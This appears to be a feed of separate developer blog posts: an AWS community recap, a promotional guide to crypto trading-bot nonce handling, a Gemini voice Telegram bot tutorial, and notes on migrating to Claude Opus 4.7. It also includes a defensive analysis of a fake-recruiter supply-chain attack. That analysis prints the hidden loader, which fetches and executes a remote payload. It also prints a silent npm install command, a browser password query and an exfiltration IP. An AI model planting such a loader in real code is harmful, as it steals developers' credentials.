2026-04-16 23:06:54
🚀 From Community to Impact: My Journey as a Cloud Club Captain & AWS Community Builder
My journey in the AWS ecosystem started as a member of the AWS UG Bogotá, where I discovered the real power of tech communities.
That experience led me to become the Captain of the AWS Cloud Club at EAN University, where I’ve been focused on building opportunities for students through cloud computing, collaboration, and real-world exposure.
Recently, we had the opportunity to participate in Santux 2026 at Universidad Santo Tomás - Seccional Tunja, where we reached:
💥 +400 in-person students
During this session, we explored how communities are transforming the relationship between academia and industry, and how AWS enables students to accelerate their careers.
But beyond the talk, what truly matters is the impact:
🤝 We supported Manuel Galindo, a passionate student, to start his own AWS Cloud Club in his university — expanding the ecosystem and empowering more students.
This is what being an AWS Community Builder means to me:
But enabling others to grow with it
We are not just building communities.
We are building the future of tech talent.
🚀 De comunidad a impacto: mi camino como Cloud Club Captain y AWS Community Builder
Mi camino en el ecosistema AWS comenzó en el AWS UG Bogotá, donde entendí el verdadero valor de las comunidades tecnológicas.
Esa experiencia me llevó a convertirme en Capitán del AWS Cloud Club at EAN University, con el objetivo de generar oportunidades reales para estudiantes a través del cloud computing.
Recientemente participamos en Santux 2026 en la Universidad Santo Tomás Seccional Tunja, donde logramos impactar:
💥 +400 estudiantes presenciales
En esta sesión compartimos cómo las comunidades están transformando la conexión entre la academia y la industria, y cómo AWS acelera el crecimiento profesional.
Pero más allá de la charla, el verdadero impacto está en las personas:
🤝 Apoyamos a Manuel Galindo para que inicie su propio AWS Cloud Club en su universidad, expandiendo el ecosistema y multiplicando oportunidades.
Esto es lo que significa para mí ser AWS Community Builder:
Sino ayudar a otros a crecer con él
No solo estamos creando comunidades.
Estamos construyendo el futuro del talento tecnológico.
2026-04-16 23:05:32
Trading bot developers face a critical challenge: managing transaction nonces across multiple blockchains while maintaining execution speed and preventing costly failed transactions. When your arbitrage bot spots an opportunity across Ethereum and Solana simultaneously, nonce conflicts can mean the difference between profit and loss.
Your trading bot operates in microseconds, but blockchain nonces operate in sequential order. Send two Ethereum transactions with the same nonce? The second fails. Skip a nonce? Your transaction gets stuck behind the gap. Worse, when running multi-chain strategies, you're juggling separate nonce sequences across EVM networks while Solana uses an entirely different transaction model with recent blockhashes.
Most trading bots hack together nonce management with local counters and prayer. When network congestion hits or your bot restarts mid-sequence, those counters desync from reality. Your profitable arbitrage opportunity becomes a series of failed transactions and wasted gas fees.
WAIaaS handles nonce management automatically across 18 networks through its 7-stage transaction pipeline. When your trading bot submits multiple transactions, the pipeline queues them correctly and maintains nonce sequences without conflicts.
The system tracks nonce state per network, automatically increments for pending transactions, and handles the complexity of EVM vs Solana transaction models. Your bot focuses on trading logic while WAIaaS ensures reliable execution.
# Check current nonce state
curl http://127.0.0.1:3100/v1/wallet/nonce \
-H "Authorization: Bearer wai_sess_<token>"
Here's how your arbitrage bot executes a cross-chain strategy without nonce headaches:
# Step 1: Swap SOL → USDC on Jupiter (Solana)
curl -X POST http://127.0.0.1:3100/v1/actions/jupiter-swap/swap \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"inputMint": "So11111111111111111111111111111111111111112",
"outputMint": "EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v",
"amount": "1000000000"
}'
# Step 2: Bridge USDC to Ethereum via LI.FI
curl -X POST http://127.0.0.1:3100/v1/actions/lifi/bridge \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"fromChain": "sol",
"toChain": "eth",
"fromToken": "EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v",
"toToken": "0xA0b86a33E6411A3d8a8269B7f9C86dfE8b68b2A0",
"amount": "100000000"
}'
# Step 3: Execute on Ethereum DeFi (WAIaaS manages nonce automatically)
curl -X POST http://127.0.0.1:3100/v1/transactions/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"type": "ContractCall",
"to": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
"data": "0x...",
"value": "0"
}'
Each transaction gets the correct nonce automatically. No local state tracking, no race conditions, no failed transactions from nonce gaps.
Trading bots need gas optimization built-in. WAIaaS includes gas conditional execution — your transactions only execute when gas prices meet your thresholds:
# Only execute when gas < 20 gwei
curl -X POST http://127.0.0.1:3100/v1/transactions/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"type": "TRANSFER",
"to": "0x...",
"amount": "0.1",
"gasCondition": {
"maxGasPrice": "20000000000"
}
}'
The transaction pipeline queues your trade and waits for favorable gas conditions. Your MEV bot captures opportunities without overpaying for execution.
High-frequency trading requires transaction batching. WAIaaS handles nonce sequencing across batch operations:
curl -X POST http://127.0.0.1:3100/v1/transactions/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"type": "Batch",
"transactions": [
{
"type": "Approve",
"spender": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
"token": "0xA0b86a33E6411A3d8a8269B7f9C86dfE8b68b2A0",
"amount": "1000000000"
},
{
"type": "ContractCall",
"to": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D",
"data": "0x38ed1739..."
}
]
}'
The approve gets nonce N, the swap gets nonce N+1. No manual nonce calculation required.
For sophisticated trading strategies, WAIaaS supports ERC-4337 Account Abstraction with UserOp bundling. Your bot can execute gasless transactions or pay gas in tokens:
# Build UserOp with automatic nonce management
curl -X POST http://127.0.0.1:3100/v1/userop/build \
-H "Content-Type: application/json" \
-H "Authorization: Bearer wai_sess_<token>" \
-d '{
"callData": "0x...",
"target": "0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D"
}'
Trading bots need guardrails. WAIaaS includes 21 policy types with 4 security tiers. Set spending limits, rate limits, and contract whitelists:
# Create trading bot policy
curl -X POST http://127.0.0.1:3100/v1/policies \
-H "Content-Type: application/json" \
-H "X-Master-Password: <password>" \
-d '{
"walletId": "<wallet-uuid>",
"type": "SPENDING_LIMIT",
"rules": {
"instant_max_usd": 1000,
"daily_limit_usd": 50000,
"hourly_limit_usd": 10000
}
}'
npm install -g @waiaas/cli
waiaas init --auto-provision
waiaas start
waiaas wallet create --name "trading-eth" --chain evm --network ethereum-mainnet
waiaas wallet create --name "trading-sol" --chain solana --network solana-mainnet
# Returns session tokens for API auth
waiaas session create --wallet trading-eth
waiaas session create --wallet trading-sol
# Configure risk limits
waiaas policy create --wallet trading-eth --type SPENDING_LIMIT \
--rule instant_max_usd=500 --rule daily_limit_usd=10000
import { WAIaaSClient } from '@waiaas/sdk';
const client = new WAIaaSClient({
baseUrl: 'http://127.0.0.1:3100',
sessionToken: process.env.WAIAAS_SESSION_TOKEN,
});
// WAIaaS handles nonces automatically
const swap = await client.executeAction('jupiter-swap', 'swap', {
inputMint: 'So11111111111111111111111111111111111111112',
outputMint: 'EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v',
amount: '1000000000'
});
Your trading bot now has enterprise-grade wallet infrastructure with automatic nonce management, gas optimization, and risk controls across 18 networks. No more failed transactions from nonce conflicts — just reliable execution for profitable trading.
Ready to eliminate nonce headaches from your trading infrastructure? Clone WAIaaS from GitHub and deploy your production-ready trading bot wallet in minutes. Check out the full documentation and examples at waiaas.ai.
2026-04-16 23:03:04
What if your Telegram bot could listen?
Not just read text — actually understand voice messages, reason about them, and talk back with a natural-sounding voice. That's what we're building today: a Telegram bot powered by Google's Gemini API that handles both text and voice, with multi-turn memory and text-to-speech replies.
Here's what it looks like in action:
All in about 400 lines of Python. Let's build it.
ffmpeg installed (brew install ffmpeg on macOS, apt-get install ffmpeg on Linux)
Create a new directory and set up the basics:
mkdir telegram-gemini-voice-bot && cd telegram-gemini-voice-bot
# Create a virtual environment
python -m venv .venv && source .venv/bin/activate
# Install dependencies
pip install 'python-telegram-bot[webhooks]~=21.11' 'google-genai>=1.55.0' 'pydub~=0.25'
Create a .env file with your credentials:
# .env
TELEGRAM_BOT_TOKEN=your-telegram-bot-token
GOOGLE_API_KEY=your-google-api-key
TELEGRAM_SECRET_TOKEN=generate-a-random-string-here
VOICE_ENABLED=true
Create bot.py and start with imports and config:
import base64
import io
import logging
import os
import wave
from google import genai
from pydub import AudioSegment
from telegram import Update
from telegram.ext import (
Application,
CommandHandler,
ContextTypes,
MessageHandler,
filters,
)
# Config
TELEGRAM_BOT_TOKEN = os.environ["TELEGRAM_BOT_TOKEN"]
GOOGLE_API_KEY = os.environ["GOOGLE_API_KEY"]
WEBHOOK_URL = os.environ.get("WEBHOOK_URL", "")
TELEGRAM_SECRET_TOKEN = os.environ.get("TELEGRAM_SECRET_TOKEN")
PORT = int(os.environ.get("PORT", "8080"))
REASONING_MODEL = "gemini-3.1-flash-lite-preview"
TTS_MODEL = "gemini-3.1-flash-tts-preview"
TTS_VOICE = "Kore"
logging.basicConfig(
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
# Initialize the Gemini client
gemini_client = genai.Client(api_key=GOOGLE_API_KEY)
We're using two Gemini models:
The Interactions API is Gemini's unified interface. Instead of juggling generateContent and manually tracking conversation history, you call interactions.create() and pass a previous_interaction_id for multi-turn — the server handles the rest.
Here's the core function that sends text or audio to Gemini:
# Track conversation state (in-memory, resets on restart)
last_interaction_ids: dict[int, str] = {} # chat_id → interaction ID
async def gemini_interact(
chat_id: int,
text: str | None = None,
audio_bytes: bytes | None = None,
) -> str:
"""Send text or audio to Gemini, return the text response."""
input_parts: list = []
if audio_bytes is not None:
# Encode audio as base64 for the API
audio_b64 = base64.b64encode(audio_bytes).decode("utf-8")
input_parts.append(
{"type": "audio", "data": audio_b64, "mime_type": "audio/ogg"}
)
input_parts.append(
{"type": "text", "text": "Listen to this voice message and respond helpfully."}
)
if text is not None:
input_parts.append({"type": "text", "text": text})
# Simplify input if it's just a single text part
if len(input_parts) == 1 and input_parts[0]["type"] == "text":
input_value = input_parts[0]["text"]
else:
input_value = input_parts
kwargs = {
"model": REASONING_MODEL,
"input": input_value,
"system_instruction": (
"You are a helpful, concise AI assistant on Telegram. "
"Keep responses short and informative. "
"Always respond in the same language the user writes or speaks in."
),
}
# Chain to previous interaction for multi-turn context
prev_id = last_interaction_ids.get(chat_id)
if prev_id:
kwargs["previous_interaction_id"] = prev_id
interaction = gemini_client.interactions.create(**kwargs)
# Store this interaction's ID for the next turn
last_interaction_ids[chat_id] = interaction.id
return interaction.outputs[-1].text or "(No response generated)"
What's happening here:
audio part alongside a text prompt telling the model what to do.interaction.id from each response and pass it as previous_interaction_id on the next call. The server keeps the full conversation history — we don't need to.Gemini's TTS model returns raw PCM audio. Telegram voice messages require OGG/Opus format. So we need a conversion pipeline:
Text → Gemini TTS → raw PCM (24kHz, 16-bit, mono) → WAV → OGG/Opus → Telegram
Here's the implementation:
async def gemini_tts(text: str) -> bytes:
"""Convert text to OGG/Opus audio bytes via Gemini TTS."""
interaction = gemini_client.interactions.create(
model=TTS_MODEL,
input=text,
response_modalities=["AUDIO"],
generation_config={
"speech_config": {
"voice": TTS_VOICE.lower(),
}
},
)
# Extract PCM audio from response
pcm_audio = None
for output in interaction.outputs:
if output.type == "audio":
pcm_audio = base64.b64decode(output.data)
break
if pcm_audio is None:
raise RuntimeError("No audio output from TTS")
# Convert raw PCM → WAV (pydub needs a container format)
wav_buffer = io.BytesIO()
with wave.open(wav_buffer, "wb") as wav_file:
wav_file.setnchannels(1) # mono
wav_file.setsampwidth(2) # 16-bit
wav_file.setframerate(24000) # 24kHz
wav_file.writeframes(pcm_audio)
wav_buffer.seek(0)
audio_segment = AudioSegment.from_wav(wav_buffer)
# WAV → OGG/Opus (Telegram's required format for voice messages)
ogg_buffer = io.BytesIO()
audio_segment.export(ogg_buffer, format="ogg", codec="libopus")
ogg_buffer.seek(0)
return ogg_buffer.read()
The key detail: Gemini TTS returns raw PCM samples at 24kHz, 16-bit, mono. We wrap it in a WAV header using Python's wave module, then use pydub (which calls ffmpeg under the hood) to re-encode as OGG/Opus — the format Telegram expects for reply_voice().
💡 Inline audio tags: Gemini TTS supports inline audio tags — square-bracket modifiers you can embed directly in your transcript to control delivery. For example,
[whispers],[laughs],[excited],[sighs], or[shouting]. You can use these in the text you pass to TTS to make responses more expressive:"[laughs] Oh that's a great question! [whispers] Let me tell you a secret..."There's no fixed list — the model understands a wide range of emotions and expressions like
[sarcastic],[panicked],[curious], and more.
Find a Gemini TTS prompting guide here: https://dev.to/googleai/how-to-prompt-gemini-31s-new-text-to-speech-model-24bb
Now wire it all together with Telegram's handler system. We need two handlers: one for text, one for voice.
async def handle_text(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""Handle incoming text messages."""
chat_id = update.effective_chat.id
user_text = update.message.text
logger.info("Text message from chat %s: %s", chat_id, user_text[:100])
# Show typing indicator
await update.message.chat.send_action("typing")
# Get Gemini response
response_text = await gemini_interact(chat_id, text=user_text)
# Always send text
await update.message.reply_text(response_text)
# Also send voice reply
try:
await update.message.chat.send_action("record_voice")
ogg_audio = await gemini_tts(response_text)
await update.message.reply_voice(voice=ogg_audio)
except Exception as e:
logger.error("TTS failed: %s", e)
async def handle_voice(update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""Handle incoming voice messages."""
chat_id = update.effective_chat.id
logger.info("Voice message from chat %s", chat_id)
await update.message.chat.send_action("typing")
# Download voice file from Telegram (already in OGG/Opus format)
voice = update.message.voice
voice_file = await voice.get_file()
audio_bytes = await voice_file.download_as_bytearray()
# Send audio directly to Gemini — it understands OGG natively
response_text = await gemini_interact(chat_id, audio_bytes=bytes(audio_bytes))
# Send text response
await update.message.reply_text(response_text)
# Send voice response
try:
await update.message.chat.send_action("record_voice")
ogg_audio = await gemini_tts(response_text)
await update.message.reply_voice(voice=ogg_audio)
except Exception as e:
logger.error("TTS failed: %s", e)
The beautiful thing here: Telegram voice messages are already OGG/Opus, and Gemini understands that format directly. No transcoding needed on input — we just pass the raw bytes.
Finally, set up the application with both polling (local dev) and webhook (production) support:
def main() -> None:
"""Start the bot."""
app = Application.builder().token(TELEGRAM_BOT_TOKEN).build()
# Register handlers
app.add_handler(CommandHandler("start", start_command))
app.add_handler(MessageHandler(filters.TEXT & ~filters.COMMAND, handle_text))
app.add_handler(MessageHandler(filters.VOICE, handle_voice))
if WEBHOOK_URL:
# Webhook mode (production / Cloud Run)
logger.info("Starting webhook on port %s → %s", PORT, WEBHOOK_URL)
app.run_webhook(
listen="0.0.0.0",
port=PORT,
url_path="webhook",
webhook_url=f"{WEBHOOK_URL}/webhook",
secret_token=TELEGRAM_SECRET_TOKEN,
)
else:
# Polling mode (local dev — no public URL needed)
logger.info("Starting polling mode (no WEBHOOK_URL set)")
app.run_polling(allowed_updates=Update.ALL_TYPES)
if __name__ == "__main__":
main()
Polling vs. Webhook:
python-telegram-bot library handles webhook registration automatically via run_webhook().# Load environment variables
export $(cat .env | xargs)
# Start in polling mode (no WEBHOOK_URL = polling)
python bot.py
Open Telegram, find your bot, and send it a voice message. You should get back a text reply and a spoken response. 🎉
Want this running 24/7 with scale-to-zero? Here's the Dockerfile:
FROM python:3.12-slim
# Install ffmpeg for audio conversion (WAV → OGG/Opus)
RUN apt-get update && \
apt-get install -y --no-install-recommends ffmpeg && \
rm -rf /var/lib/apt/lists/*
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY bot.py .
ENV PORT=8080
EXPOSE 8080
CMD ["python", "bot.py"]
gcloud and Enable APIs
First, make sure your gcloud CLI is configured with the right project:
gcloud init --skip-diagnostics
Enable the required APIs — Secret Manager for storing credentials and Cloud Build for building your container:
gcloud services enable secretmanager.googleapis.com
gcloud services enable cloudbuild.googleapis.com
Never put API keys in environment variables directly. Use Secret Manager:
echo -n "$(grep TELEGRAM_BOT_TOKEN .env | cut -d '=' -f2)" | \
gcloud secrets create TELEGRAM_BOT_TOKEN --data-file=-
echo -n "$(grep GOOGLE_API_KEY .env | cut -d '=' -f2)" | \
gcloud secrets create GOOGLE_API_KEY --data-file=-
echo -n "$(openssl rand -base64 32)" | \
gcloud secrets create TELEGRAM_SECRET_TOKEN --data-file=-
Note: The
echo -nflag strips the trailing newline so it's not included in the stored secret. If you see a%at the end of the output when echoing — that's just zsh indicating no trailing newline, not part of your secret.
Cloud Run source deploys use the default Compute Engine service account to build and run your container. This account needs three additional roles that aren't granted by default:
# Get your project number
PROJECT_NUMBER=$(gcloud projects describe $(gcloud config get-value project) \
--format='value(projectNumber)')
# Allow the service account to build containers
gcloud projects add-iam-policy-binding $(gcloud config get-value project) \
--member="serviceAccount:${PROJECT_NUMBER}[email protected]" \
--role="roles/cloudbuild.builds.builder"
# Allow it to read uploaded source code from Cloud Storage
gcloud projects add-iam-policy-binding $(gcloud config get-value project) \
--member="serviceAccount:${PROJECT_NUMBER}[email protected]" \
--role="roles/storage.objectViewer"
# Allow it to access secrets at runtime
gcloud projects add-iam-policy-binding $(gcloud config get-value project) \
--member="serviceAccount:${PROJECT_NUMBER}[email protected]" \
--role="roles/secretmanager.secretAccessor"
Why are these needed? The default Compute Engine service account has the roles/editor role, but Editor doesn't include Cloud Build execution, fine-grained Cloud Storage read access, or Secret Manager access. This is a one-time setup per project.
gcloud run deploy telegram-gemini-bot \
--source . \
--region us-central1 \
--allow-unauthenticated \
--set-secrets="TELEGRAM_BOT_TOKEN=TELEGRAM_BOT_TOKEN:latest,GOOGLE_API_KEY=GOOGLE_API_KEY:latest,TELEGRAM_SECRET_TOKEN=TELEGRAM_SECRET_TOKEN:latest" \
--no-cpu-throttling
Note on --no-cpu-throttling: This tells Cloud Run to keep the CPU active even after the initial response is sent. Since the bot needs to process TTS and send a voice reply after acknowledging the message, this prevents the CPU from being throttled, which would otherwise cause the voice reply to be delayed or stall until the next message arrives.
Notice there's no WEBHOOK_URL here — and that's fine. The bot detects Cloud Run automatically via the K_SERVICE environment variable (which Cloud Run always sets) and starts the HTTP server on port 8080. It just won't register a webhook with Telegram yet, so it won't receive messages until Step 5.
Grab the actual service URL from the deploy output, then update the service:
gcloud run services update telegram-gemini-bot \
--region us-central1 \
--update-env-vars="WEBHOOK_URL=https://telegram-gemini-bot-xxxxx-uc.a.run.app"
Cloud Run gives you HTTPS, auto-scaling, and scale-to-zero — you only pay when someone actually messages the bot.
| Error | Cause | Fix |
|---|---|---|
PERMISSION_DENIED: Build failed because the default service account is missing required IAM permissions |
Compute Engine service account lacks Cloud Build permissions | Grant roles/cloudbuild.builds.builder and roles/storage.objectViewer (see Step 3) |
Permission denied on secret |
Service account can't access Secret Manager | Grant roles/secretmanager.secretAccessor (see Step 3) |
API [secretmanager.googleapis.com] not enabled |
Secret Manager API hasn't been turned on | Run gcloud services enable secretmanager.googleapis.com
|
API [cloudbuild.googleapis.com] not enabled |
Cloud Build API hasn't been turned on | Say Y when prompted, or run gcloud services enable cloudbuild.googleapis.com
|
Voice replies are slow or delayed |
CPU is being throttled after the text response | Deploy with --no-cpu-throttling to keep CPU active for background tasks |
Traditional chatbot APIs make you manage the conversation history. You send the full history on every request, and your token costs grow with every turn.
The Interactions API flips this. You pass previous_interaction_id and the server keeps the context:
# Turn 1
i1 = client.interactions.create(model="gemini-3.1-flash-lite-preview", input="Hi, I'm Alex")
# Turn 2 — server remembers "Alex"
i2 = client.interactions.create(
model="gemini-3.1-flash-lite-preview",
input="What's my name?",
previous_interaction_id=i1.id # ← that's it
)
In our bot, we key this by chat_id, so each Telegram chat gets its own conversation thread.
Gemini understands audio natively. No whisper, no transcription step, no intermediate text. We send the OGG bytes directly:
input_parts = [
{"type": "audio", "data": audio_b64, "mime_type": "audio/ogg"},
{"type": "text", "text": "Listen and respond helpfully."},
]
This means the model hears tone, emphasis, and language — not just words. It can respond in the same language the user speaks, detect questions vs. statements, and pick up on nuance that'd be lost in transcription.
We use two different models for two different jobs:
| Job | Model | Why |
|---|---|---|
| Understanding + reasoning | gemini-3.1-flash-lite-preview |
Cheapest, fastest — ideal for a chatbot |
| Text-to-speech | gemini-3.1-flash-tts-preview |
Purpose-built for natural speech synthesis |
This is cheaper and better than using a single model for both. Flash Lite handles the thinking, TTS handles the speaking.
The full source code extends this with:
/voice on|off to control TTS responses/language Spanish to set the translation targetThese are all just variations on the same gemini_interact() function with different system_instruction values. The core voice pipeline stays the same.
TL;DR: Gemini's Interactions API makes voice bots surprisingly simple. Audio goes in as base64, text comes out, TTS converts it back to speech. The server tracks conversation state so you don't have to. Add a Dockerfile and you've got a production-ready voice assistant on Cloud Run.
Happy hacking! 🚀
2026-04-16 23:03:01
Last week I caught a sophisticated supply-chain attack targeting developers before it could execute. I want to document exactly how it worked so you can recognize it if it comes for you.
A LinkedIn connection request from Andre Tiedemann, claiming to be CEO of a Web3 startup called Pass App. Profile looked legitimate — blue verification checkmark, 377 connections, 12 years at Airbus in his work history, proper headshot.
The pitch was standard: Engineering Manager role, decentralized platform, crypto payments integration. He asked screening questions, requested my CV, and scheduled a 4PM CET interview for the next day.
Then, without waiting for confirmation, he sent this:
"I shared a demo project: https://bitbucket.org/welcome-air/welcome-nest/src/main/ — Try setting it up locally, it'll help you get a better feel for how everything's structured. Please review our project and share your opinions on our meeting."
The meeting never happened. That was the entire point — get the repo cloned and executed before any scrutiny.
The repository was a clean, realistic React/Node.js fullstack project. Proper folder structure, reasonable code, nothing obviously wrong on a quick scroll.
Two files had been surgically modified:
server/config/config.js — added three innocuous-looking exports:
exports.locationToken = "aHR0cHM6Ly93d3cuanNvbmtlZXBlci5jb20vYi9VVkVYSA==";
exports.setApiKey = (s) => { return atob(s); };
exports.verify = (api) => { return axios.get(api); };
locationToken is a Base64 string that decodes to https://www.jsonkeeper.com/b/UVEXH — a third-party JSON hosting service used as a payload staging server.
server/routes/auth.js — an IIFE injected at the top:
(async () => {
verify(setApiKey(locationToken))
.then(response => {
new Function("require", Buffer.from(response.data.model, 'base64').toString('utf8'))(require);
})
.catch(error => { });
})();
On server start, this silently fetches the remote payload, Base64-decodes it, and executes it via new Function() — passing require so it has full Node.js access. The catch block swallows all errors silently.
The payload fetched from jsonkeeper.com was a 2.8MB RC4-obfuscated JavaScript file — 17,278 encrypted string array entries, 508,646 array rotations, 119 wrapper decode functions. Not something you reverse by reading it.
First thing it does after decoding itself: check if it's running in an analysis environment.
// Sandbox detection
{}.constructor("return this")() // behaves differently in vm.createContext
// WSL detection
process.env.WSL_DISTRO_NAME
fs.readFileSync('/proc/version').includes('microsoft')
// Debugger detection + VM heuristics
If it passes those checks, it silently installs four npm packages:
npm install sql.js socket.io-client form-data axios --no-save --loglevel silent
--no-save means nothing appears in package.json. --loglevel silent suppresses all output. Then it spawns three background processes and gets to work.
I executed the payload in an isolated sandbox VM with no access to real credentials or production systems. Here's what it would have gone after on a real machine.
Browsers targeted (13): Chrome, Firefox, Brave, Edge, Opera, Opera GX, Vivaldi, Yandex, Kiwi, Iridium, Comodo Dragon, SRWare Iron, Chromium.
For Chromium-based browsers it runs direct SQLite queries against Login Data:
SELECT origin_url, username_value, password_value FROM logins
Passwords are decrypted using platform key extraction (DPAPI on Windows, AES-GCM on Linux/macOS).
For Firefox it targets both logins.json AND key4.db — with both files together all stored passwords are fully decryptable offline.
It also targets:
~/.ssh/
~/.aws/credentials~/.docker/config.json.env, password, token, secret, api_key, wallet, .sqlite
login.keychain-db)Everything gets exfiltrated to 216.126.225.243 (Ogden, Utah — bulletproof hosting on AS46664 VolumeDrive) via Socket.IO on port 8087 and HTTP uploads on ports 8085/8086.
Pass App was a real company that shut down on December 16, 2025. They had 10.4K Twitter followers and announced their closure publicly. Their website went offline. Their LinkedIn presence went dormant.
Four months later, the attacker hijacked that abandoned identity. The LinkedIn company page still had 585 followers and looked active. The real company's credibility became the attacker's cover.
One tell: Andre's pitch described Pass App as "a decentralized Airbnb-style platform" — completely different from the real product (an AI crypto wallet). The attacker's script hadn't been updated to match the brand they stole.
This is a known campaign called "Contagious Interview" (also tracked as "Dev Recruiter"). It has been running since at least 2023 and is attributed to DPRK-linked threat actors — specifically Lazarus Group / TraderTraitor. The goal is financially motivated: cloud credentials, crypto wallets, and SSH keys to pivot into production infrastructure.
The malware family is consistent with BeaverTail (the obfuscated JS infostealer) and InvisibleFerret (the Python-based backdoor that sometimes follows it).
The ukey: 506 field in the C2 registration event suggests at least 506 active operator accounts in this campaign's infrastructure.
Code review before running anything. The locationToken export looked odd — why is an API key Base64-encoded inline in config? Decoded it, saw jsonkeeper.com, fetched the URL, got a 2.8MB JSON blob with a model field.
I never ran it on my machine. I spun up an isolated VM instead.
| Signal | What it meant |
|---|---|
Contact email is @hotmail.com with random suffix |
Not a company domain — fake or hijacked account |
| LinkedIn connection made the day before the attack | Purpose-built connection, not a real relationship |
| Company website returns "Server Not Found" | No legitimate business behind the persona |
| Meeting scheduled but never confirmed | Meeting was only a pretext to get the repo run |
| Repo delivered before meeting acceptance | Urgency tactic — get it executed before scrutiny |
| Product description doesn't match company | Attacker's script wasn't updated for the stolen brand |
Never run npm install on a repo from someone you just met online without reading every file in package.json scripts, every entry point, and especially any files that run on startup.
Use a disposable VM for any externally-provided code. No SSH agent forwarding. No access to ~/.aws or ~/.docker. Snapshot before, delete after.
Check the company website. If it's down, walk away.
A recruiter email that doesn't match their company domain is a hard stop.
If you've recently cloned a repo from a LinkedIn recruiter and ran it on your real machine — check your ~/.ssh/, .env files, and browser credentials immediately. Look for lock files matching {tmpdir}/pid.*.lock. If you find them, assume full compromise.
IOCs, full technical details, and deobfuscated payload signatures have been shared with law enforcement and submitted to MalwareBazaar and VirusTotal.
Stay safe.
2026-04-16 23:00:14
Adaptive thinking is Claude Opus 4.7's only supported reasoning mode: you pass thinking: {type: "adaptive"} and the model decides how much to reason, with budget_tokens removed from the API entirely. My production trading bot threw 400 Bad Request on its first inference after I bumped claude-opus-4-6 to claude-opus-4-7 — one character in a model ID, three breaking changes attached.
Anthropic shipped Opus 4.7 on April 16 at the same sticker price as Opus 4.6: $5 per million input tokens, $25 per million output tokens. That sameness is misleading. The model ID is claude-opus-4-7, the context window is 1M tokens, max output is 128k, and knowledge cutoff is January 2026. Vision accepts 2,576-pixel long-edge images, about 3.75 megapixels, which Anthropic describes as "more than 3x as many pixels" as prior Claude models. The release is available on the Claude API, Amazon Bedrock research preview, Google Vertex AI, and Microsoft Foundry.
Flat pricing on a new tokenizer is not flat pricing. I'll get to the math in a minute, but first the three changes that matter when you flip the model ID.
Here is the code that worked on Opus 4.6 and dies on Opus 4.7.
const response = await client.messages.create({
model: "claude-opus-4-6",
max_tokens: 16000,
thinking: {
type: "enabled",
budget_tokens: 10000,
},
messages: [{ role: "user", content: task }],
});
for (const block of response.content) {
if (block.type === "thinking") {
console.log(block.thinking);
}
}
thinking.type: "enabled" and the budget_tokens field together used to mean "reason up to 10,000 tokens before answering." Opus 4.7's gateway rejects that shape with a 400. There is no deprecation shim. You get an error body complaining about thinking.type, and your workflow stops.
The replacement, from the adaptive thinking docs, looks like this.
const response = await client.messages.create({
model: "claude-opus-4-7",
max_tokens: 16000,
thinking: { type: "adaptive", display: "summarized" } as any,
output_config: { effort: "high" } as any,
messages: [{ role: "user", content: task }],
});
Three shifts. The type moves to "adaptive", which lets the model choose reasoning depth per request. Budget control migrates from integer tokens to the categorical effort field on output_config. And the SDK's TypeScript definitions have not shipped yet for these fields, so as any is the pragmatic workaround for the next few days. Opus 4.6 and Sonnet 4.6 still accept "enabled" as deprecated behavior, but anything new should target the adaptive shape to avoid back-to-back migrations.
Two side effects of adaptive worth flagging. First, interleaved thinking — reasoning between tool calls — is on by default in adaptive mode. Agent loops that previously needed a beta header now get mid-call reasoning for free, which is the concrete backing for Anthropic's "step-change improvement in agentic coding" claim. Second, thinking itself is OFF by default on Opus 4.7. Drop the thinking field entirely and you get no reasoning blocks — not an error, just worse answers. If you are migrating existing code, add an explicit thinking: {type: "adaptive"} at every call site rather than relying on the old implicit default.
The second breaking change does not throw. The default value of thinking.display used to be "summarized" on Opus 4.6. On Opus 4.7 the default is "omitted", which means block.thinking comes back as an empty string.
I caught this in LLMTrio, which has a "show Claude's reasoning" disclosure UI. Thirty minutes after rolling out the Opus 4.7 bump, the first report came in: the panel had gone blank. The thinking blocks were still in the response — type thinking, full signature field — but the text payload was empty. The fix is one line: pass display: "summarized" explicitly.
The encrypted signature field still travels regardless of display. Multi-turn continuity — feeding prior reasoning into the next turn — works independently. Anthropic's rationale for "omitted" as the new default is faster time-to-first-text-token when streaming. That makes sense for chat UIs where the user never sees reasoning anyway. It bites hard for research tools, agent observability dashboards, and any product that surfaces a reasoning trace.
This is the migration where a code reviewer really earns their keep. The compiler does not help; every call site needs the explicit display flag, and missing ones will only surface in UI bug reports.
The third change you only catch by measuring. Opus 4.7 ships a new tokenizer. Anthropic's migration docs describe the input token count as "roughly 1.0–1.35x depending on content type." Prices held flat, so the invoice for an identical workload can rise by up to 35 percent.
In worked numbers: a workload that metered 500M input tokens per month on Opus 4.6, costing $2,500 per month, can meter as 675M input tokens on Opus 4.7 in the worst case, costing $3,375 per month. $875 delta per month from tokenizer swap alone. The models overview makes the same claim from the other direction: 1M tokens holds ~750k English words on Opus 4.6 but only ~555k on Opus 4.7. That ratio is basically 1.35x.
My own corpus confirms the ceiling is real for Korean text and typed code. The same prompt that metered 2,312 tokens on Opus 4.6 yesterday metered 3,014 tokens on Opus 4.7 today — a 1.30x ratio. My trading bot's prompts, which I broke down in Trading bot with 15 strategies, are densely typed TypeScript and saw the biggest jumps. I learned the hard way from my llmtrio caching work that you measure before you flip. This is that test, at scale.
Post not found or has been removed.
Post not found or has been removed.
